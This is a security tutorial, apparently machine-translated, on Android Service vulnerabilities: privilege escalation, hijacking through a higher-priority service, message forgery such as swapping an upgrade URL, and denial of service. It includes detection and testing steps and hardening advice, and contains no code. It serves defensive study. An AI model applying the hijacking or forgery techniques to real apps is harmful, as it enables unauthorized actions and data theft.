0x00 Service Security Introduction
1. Vulnerability scenario
Service is one of the four major components of Android. A Service is an application component that has no interface and can run in the background for a long time.
If an exported Service does not have corresponding permission restrictions, any application can be started and bound to this Service, depending on the exposed functions, which may cause an application to perform unauthorized actions, obtain sensitive information or pollute Modifying the state of internal applications poses a threat.
2. Vulnerability classification
- Privilege escalation
- Service hijacking
- Message forgery
- Denial of service
0x01 privilege escalation
1. Vulnerability principle
When a service is configured to intent-filterbe exported by default, if there is no permission restriction on calling this service or the identity of the caller is not effectively verified, then the maliciously constructed APP can pass in the appropriate parameters to call the service. , Leading to malicious behavior, such as calling the delete uninstall service with system permissions to delete and uninstall other applications.
2. Protection
Declare its calling authority when registering.
0x02 Service hijacking
1. Vulnerability principle
- The method to start the Service is ComponentName startService(intent service).
- There are two situations in which the intent parameter to start the service is used:
- Set the action, start the service by verifying the action
- Clearly specify the Service to be started and the package name ComponentName.
When the service is started only by action, the attacker can create a Service that receives the action.
In the Android system, if there are multiple services that receive the same action, first look at the priority value, the higher the value, the first to start. There are services with the same priority value, and the service that installs the application first has a higher priority.
2. Detection method
Scan all the methods startServiceand bindServicemethods of the application , check the started Intent parameters, and determine whether the Intent meets the following conditions:
1. The Intent specifies the class when it is created
2. Intent uses the setClass method to specify the class
3. Intent uses the setComponent method to specify the package and class.
If the Intent does not meet any of the above conditions, the Service is at risk of being hijacked by external applications.
Utilization: When the target Service is started by an action, the attacker can create a Service that receives the same action and has a higher priority value.
3. Protection
0x03 message forgery
1. Vulnerability principle
The exposed Service receives the Intent from the outside. If a malicious message is constructed and transmitted in the Intent, the received Service may cause security risks.
2. Examples of vulnerabilities
Replacing the URL address of the specified upgrade download can cause any application to be installed.
3. Fix the code
0x04 Denial of service
1. Vulnerability principle
The main reason is that the program crashes because the received Intent is not handled in abnormal situations when the Service is started .
2. Protection
Handle the received intent and the information it carries carefully.
try catchDeal with any data received, and deal with abnormal information that does not meet expectations.
Common exception handling:
- Null pointer exception handling
- Type conversion exception (serialization)
- Array out of bounds access exception
- Class undefined exception
- Other abnormalities
0x05 test method
1. Find the exported Service
The service can only be registered statically. The service can be determined by checking the manifest.xml through decompilation or using drozer. If there is an exported service, proceed to the next step.
2. View the service class
Focus onCreate/ onStarCommand/ onHandleIntentmethod.
3. Retrieve all classes startService/ bindServicemethods and the data passed by them;
4. Write test poc according to business conditions or directly use adb command to test.
0x06 Security Recommendations
1、intent-filter和exported
- The exported attribute is clearly defined
- Private service does not define intent-filter and set exported to false
- The public service is set to be exported to true, and the intent-filter can be defined or undefined
- Internal/cooperative service set exported to true, intent-filter is not defined
2、other
- The service used only by the application itself should be set to private
- The data received by the service needs to be processed
- Internal service should set protection level="signature"
- It should not be decided whether to provide the service when the service is created (onCreate method is called), and the judgment should be made when the methods such as onStartCommand/onBind/onHandleIntent are called.
- Try not to send sensitive data, and when returning data, judge whether the data receiving app is at risk of leakage
- The cooperative service should verify the app signature of the cooperative company
- When there is a clear service to call, use the display intent
0x07 reference
https://tea9.xyz/post/962818054.html
https://github.com/WooyunDota/DroidDrops/tree/master/2014